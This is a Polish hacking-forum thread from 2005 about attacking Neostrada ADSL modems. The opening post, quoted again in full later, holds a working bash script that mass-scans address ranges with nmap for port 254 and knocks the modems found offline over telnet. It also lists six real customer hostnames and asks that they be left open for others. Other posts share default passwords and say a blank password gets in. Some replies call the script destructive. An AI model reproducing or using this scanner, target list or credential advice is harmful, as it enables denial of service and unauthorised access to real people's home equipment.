Oto sposob jak haxorowac neostrade

[Pedrosov]

Dzieki temu mozna znajdowac modemy podatne na atak

Napisalem cos takiego macie i sie cieszcie Haxory takie jak wy tutaj na pewno robia wieksze sztuczki ale niech i to bedzie:


#!/bin/bash
################################################################
#
# Skrypt skanujacy siec w poszukiwaniu otwartego portu 254
# na ktorym jak kazdy wie siedza niezabezpieczone modemy adsl
# w tym takze neostrada

#
# WYMAGANE JEST POSIADANIE PROGRAMU: nmap
#
# szukanie modemow : ./neoskaner 83.35.31.1-200
# ubijanie wszystkich znalezionych : ./neoskaner 83.35.31.1-200 killall
# ubijanie konkretnego : ./neoskaner kill 83.35.31.12
#
# wsrod tych ludkow poszuka portu 254 i wypisze hosty jak znajdzie
# Ip mozna podac tak jak sie podaje do nmapa czyli mozna z zakresami
# Jak cos nie dziala to masz pecha
#
# 21.03.2005
#
##############################################################

if [ "$1" != "kill" ]
then
echo "Poszukiwanie aktywnych uzytkownikow"
nmap -sP $1 | grep "neoplus" | cut -d " " -f 2 > tmp
il=`wc -l tmp | cut -d " " -f 1`
echo "Uzytkownikow mamy ($il)"

echo "Zaczynamy szukania modemow"

for zm in `cat tmp`
do
res=`nmap $zm -p 254 | grep "open"`
r=`echo "$res $zm" | grep "open" | cut -d " " -f 5`
if [ "$r" != "" ]
then
echo $r
if [ "$2" = "killall" ]
then
k=`echo -e "n2n6yn" | telnet $zm 254`
echo "Ubito: $zm"
fi
fi
done

rm tmp
else
k=`echo -e "n2n6yn" | telnet $2 254`
echo "Ubito: $2"
fi


Oczywiscie skrypt jest pod jedynie slyszny system czyli linuxa

Na łindołsa takze mozna przerobic ale po co?

Wszystko co potrzeba opisane jest w zakomentowanym kawalku. Jak sie wyszuka modemy to mozna na nie sie zalogowac telnetem na port 254

Aby bylo zabawniej ponizej podam akutalna na ta chwile liste adresow (szukania bylo cale 3min) na ktore tak mozna wejsc i prosba abyscie nie blokowali ich od razu niech inni tez sie pobawia:

bir82.neoplus.adsl.tpnet.pl
bir124.neoplus.adsl.tpnet.pl
bir198.neoplus.adsl.tpnet.pl
bir247.neoplus.adsl.tpnet.pl
biq175.neoplus.adsl.tpnet.pl
biq247.neoplus.adsl.tpnet.pl

Ahoj

 

[hard21]

Dobra wszystko QL ale jaki jest sens resetowac komus modem jesli po kilku sekundach znowu sie polaczy a w przypadku dzialania modemu na linuksie nastepuje to automatycznie... Z reszta bug w modemach adsl znany jest juz od 2uch lat. Z tego co wiem na poczatku po wejsciu na modem mozna bylo sie pobawic DNSami itp ustawiac tunelowanie i inne ciekawe piedoly ktore dawaly multum fajnych mozliwosci Teraz mozna jedynie sprawdzic parametry pracy modemu i go zresetowac... No chyba ze o czyms nie wiem... Aha no i dodam jeszcze ze prawie kazdy modem do ktorego da sie wbic na porcie 254 ma otwarty rowniez port 21... Na jakiejs stroce wyczytalem ze o ile wlasciciel nie zmienil hasla , dzialaja nastepujace kombinacje:
administrator / password
admin / pass
conexant / conexant

Musze przyznac ze bawilem sie sporo czasu z tym portem na roznych maszynach ale w zadnej wymienione wyzej kombinacje nie przyniosly rezultatu... Jesli ktos mialby wiecej standardowych loginow i haselek to byloby QL

Albo jakies wieksze info na ten temat tez bedzie dobre

 

[wgnr27]

Originally posted by Pedrosov
Dzieki temu mozna znajdowac modemy podatne na atak

Napisalem cos takiego macie i sie cieszcie Haxory takie jak wy tutaj na pewno robia wieksze sztuczki ale niech i to bedzie:


#!/bin/bash
################################################################
#
# Skrypt skanujacy siec w poszukiwaniu otwartego portu 254
# na ktorym jak kazdy wie siedza niezabezpieczone modemy adsl
# w tym takze neostrada

#
# WYMAGANE JEST POSIADANIE PROGRAMU: nmap
#
# szukanie modemow : ./neoskaner 83.35.31.1-200
# ubijanie wszystkich znalezionych : ./neoskaner 83.35.31.1-200 killall
# ubijanie konkretnego : ./neoskaner kill 83.35.31.12
#
# wsrod tych ludkow poszuka portu 254 i wypisze hosty jak znajdzie
# Ip mozna podac tak jak sie podaje do nmapa czyli mozna z zakresami
# Jak cos nie dziala to masz pecha
#
# 21.03.2005
#
##############################################################

if [ "$1" != "kill" ]
then
echo "Poszukiwanie aktywnych uzytkownikow"
nmap -sP $1 | grep "neoplus" | cut -d " " -f 2 > tmp
il=`wc -l tmp | cut -d " " -f 1`
echo "Uzytkownikow mamy ($il)"

echo "Zaczynamy szukania modemow"

for zm in `cat tmp`
do
res=`nmap $zm -p 254 | grep "open"`
r=`echo "$res $zm" | grep "open" | cut -d " " -f 5`
if [ "$r" != "" ]
then
echo $r
if [ "$2" = "killall" ]
then
k=`echo -e "n2n6yn" | telnet $zm 254`
echo "Ubito: $zm"
fi
fi
done

rm tmp
else
k=`echo -e "n2n6yn" | telnet $2 254`
echo "Ubito: $2"
fi


Oczywiscie skrypt jest pod jedynie slyszny system czyli linuxa

Na łindołsa takze mozna przerobic ale po co?

Wszystko co potrzeba opisane jest w zakomentowanym kawalku. Jak sie wyszuka modemy to mozna na nie sie zalogowac telnetem na port 254

Aby bylo zabawniej ponizej podam akutalna na ta chwile liste adresow (szukania bylo cale 3min) na ktore tak mozna wejsc i prosba abyscie nie blokowali ich od razu niech inni tez sie pobawia:

bir82.neoplus.adsl.tpnet.pl
bir124.neoplus.adsl.tpnet.pl
bir198.neoplus.adsl.tpnet.pl
bir247.neoplus.adsl.tpnet.pl
biq175.neoplus.adsl.tpnet.pl
biq247.neoplus.adsl.tpnet.pl

Ahoj

NO I WRESZCIE KTOŚ NAPISAŁ MORZĄDNY TEMAT

I O TAKICH ZECZACH POWINNO SIE TU PISAC A NIE O PROBLEMACH Z POŁĄCZENIEM PRZEZ TROJANA :/

POZDRO ALL :]

 

[FallenAngel]

MORZĄDNY........ZECZACH[/b]

w końcu to forum hakerskie a że nie wszyscy są już na stopniu zaawansowanym to miewają problemy typu "Problem z trojanem"

Pozdro 8)

 

[fl3a]

Tak, jedna osoba cos napisze a reszta biegnie i sprawdza co popadnie! Rewelacja! Napisac skrypt tez nie jest trudno. A moze zorganizowalibyscie jakis konkurs, jakies zawody na napisanie samodzielnego progeamu, ktory by costam robil. Cel by oczywiscie wszyscy uzgodnili razem. Potem kazdy przedstawilby swoj projekt, opisal zalet, wady i technologie... Wtedy dopiero by wyszlo ile osob na prawde cos pisze a nie testuje gotowe i destrukcyjne programiki...

 

[kiela]

to jest dobry pomysl ale nie wszyscy by wzieli w nim udzial nawet jesli ktos programuje bo np. szkola

albo praca i takie tam ale pomysl super !!

 

[Pedrosov]

Originally posted by hard21
Jesli ktos mialby wiecej standardowych loginow i haselek to byloby QL

Albo jakies wieksze info na ten temat tez bedzie dobre

Pyta o haslo naciskasz enter

Originally posted by fl3a
Napisac skrypt tez nie jest trudno.

To moze sie czyms pochwalisz skoro to nie jest trudne

Originally posted by FallenAngel
w końcu to forum hakerskie

Najsmieszniejsze jakie kiedykolwiek widzialem

 

[fl3a]

Pedrosov: Juz pisalem i w Keyloggerach i w Programowanie tylko (prawie) nikt sie nie zainteresowal. A nie zamierzam pisac jakis programikow destrukcyjnych etc. Zrozum, ze ludzi nie interesuje co jest w Twoim zrodelku! Wola wiedziec jak tego uzyc i co dzieki temu beda mieli. Napisales skrypt milo ale lepiej bylo by gdybys napisal cos pod Windowsa, skompilowal, etc. Bo to dopiero system dla prawdziwych Hackerow ;-)

A co do konkursu to najpierw mozna poprzestac na pomyslach. Co dany program powinien robic, jak, jakie powinien miec funkcje itp. Sam nie mam czasu teraz ale mozna sie pobawic i przy okazji przeprowadzic ankiete ile osob wogole byloby zaineresowane tym tematem i ile osob potrafi programowac a nie kopiowac gotowce...

 

[Pedrosov]

Originally posted by fl3a
Zrozum, ze ludzi nie interesuje co jest w Twoim zrodelku! Wola wiedziec jak tego uzyc i co dzieki temu beda mieli. Napisales skrypt milo ale lepiej bylo by gdybys napisal cos pod Windowsa, skompilowal, etc. Bo to dopiero system dla prawdziwych Hackerow ;-)

Ale kompilowanie basha to utrudnienie wszystkiego tak jest latwiej a wkleilem zrodlo bo nie jest dlugie i nie musialbym gdzies wrzucac calosci tylko kazdy sobie moze skopiowac chmod +x a jak uzywac jest w zakomentowanej czesci mysle ze i tak duzo

Pod windowsa to trzeba by pomyslec czym nmapa zastapic i w ogole trudniej to zrobic aby latwo to napisac i sie nie bawic (a ponoc to w linuxie cos ciezko zrobic

)

 

[uzol]

Originally posted by Pedrosov
kompilowanie basha

masz na mysli zrodla basha?

 

[Pedrosov]

Originally posted by uzol
masz na mysli zrodla basha?

Nie mam na mysli zrobic z tego skryptu co napisalem exeka aby kazdy łindołsowiec mogl sobie z tym poradzic. W sumie to bash jest tez pod windowsa ale problem z nmapem by sie zrobil i w sumie tyle

 

[uzol]

Originally posted by Pedrosov+--><div class='quotetop'>CYTAT(Pedrosov)</div>

<!--QuoteBegin-uzol

masz na mysli zrodla basha?

Nie mam na mysli zrobic z tego skryptu co napisalem exeka aby kazdy łindołsowiec mogl sobie z tym poradzic. W sumie to bash jest tez pod windowsa ale problem z nmapem by sie zrobil i w sumie tyle

[/b]

nie zrobisz z tego exeka. na windowsie mozna to odpalic przez cygwin. z nmap racja nie ma go czym zabardzo zastapic.

 

[DJBOSS666]

Uch a po co nmap :/ przeciez moze to byc jakis zwykly skaner portow ktory skanuje pewnien zakres ip, wyszukujac czy dany port jest otwarty :/

A ta poza tym to nic oprocz zrestartowania modemu ADSL to sie nie da zrobic :/ wiec to takie troszku glupie pisac skrypt i w dodatku go udostepniac takim ludziom znajdujacym sie na tym forum :/ jeszcze rozumiem zeby skrypt tylko wyszukiwal zdalne maszyny i sie z nimi laczyl ale ten skrypt to poprostu taki robak rozprzestrzeniajacy sie za pomoca skript kiddies :/


PS: zreszta jaki jest cel masowego hacku ? chyba w chakierowaniu chodzi o to zeby zaatakowac wybrany cel a nie wszytskie po kolei.

PS2: To nie hack program ale crack program!


Pozdrawiam


DJBOSS666

 

[Tadeusz Fantom]

Jest nmap w wersji dla Wndows, chociaż przyznam się nmap-a używam tylko pod Linuxem i trudno powiedzieć mi jak się sprawuje pod Windowsem.
Pobrać go mozna :
http://download.insecure.org/nmap/dist/nmap-3.81-win32.zip

 

[WalgO]

ajjjj tam , niech lamki mają , niech sie bawią i cieszą mordki ;]

 

[sesego]

Originally posted by fl3a
Pedrosov: Juz pisalem i w Keyloggerach i w Programowanie tylko (prawie) nikt sie nie zainteresowal. A nie zamierzam pisac jakis programikow destrukcyjnych etc. Zrozum, ze ludzi nie interesuje co jest w Twoim zrodelku! Wola wiedziec jak tego uzyc i co dzieki temu beda mieli. Napisales skrypt milo ale lepiej bylo by gdybys napisal cos pod Windowsa, skompilowal, etc. Bo to dopiero system dla prawdziwych Hackerow ;-)

A co do konkursu to najpierw mozna poprzestac na pomyslach. Co dany program powinien robic, jak, jakie powinien miec funkcje itp. Sam nie mam czasu teraz ale mozna sie pobawic i przy okazji przeprowadzic ankiete ile osob wogole byloby zaineresowane tym tematem i ile osob potrafi programowac a nie kopiowac gotowce...

ze jak?? ze co?? ze poco?? ze do czego?? co windows ?? czy ja czego nie sqmalem?? windows?? jedyne co ma wspolne haker z windowsem to taka ze czasami dla rozrywki znajdze jakis server postawiony na łingrozie i bez zadnego problemu np. podmieni strone, wlamie sie czy jakies inne głupoty... :| i .. prawdziwy hakerzy tak.. to jest mysl... nie ma to jak pracowac na winshicie... kiedys jeszcze jak byłem mały to kożystało sie z niego... (czasami dzisiaj tez :/ rodzina nadal twierdzi że windows jest najlepszy :/:/:/ )

 

[GreEnSnake]

On nie mowil tego doslownie :? swiadczy o tym buzka na koncu ---> ;-) .

 

[Hunter]

mam neo lecz nie korzystam z modemu telekomuny bo jest lipny i sa lepsze "bajerki" niz to co napisales, ps. na nowych modelach nie dziala

po drugie mojego modemu nie wyskanujesz nmapem // ciekawa konfiguracja

po trzecie dlaczego co 3 pedal mysli ze siedzac na linux jest kims ? proftpd 1.3x na linxie tez rozpierdole jesli bede w lanie na dodatek wystarczy mi do tego windows

po czwarte primo kurfa ultimo ^^ , wiedza a inteligencja to nie to samo
po piate primo multi kino =) , umiejetnosci nie zaleza od typu systemu na ktorym sie jest
po szoste co z tego ze siedzisz na linux skoro i tak nie potrafisz go skonfigurowac?

po siodme napisz w c++ bo bash'a uczy sie po drodze tzn. 1-2 h tak jak pliki wsadowe hihi :rotfl:
po osme w cygwinie mozna uruchomic nmapa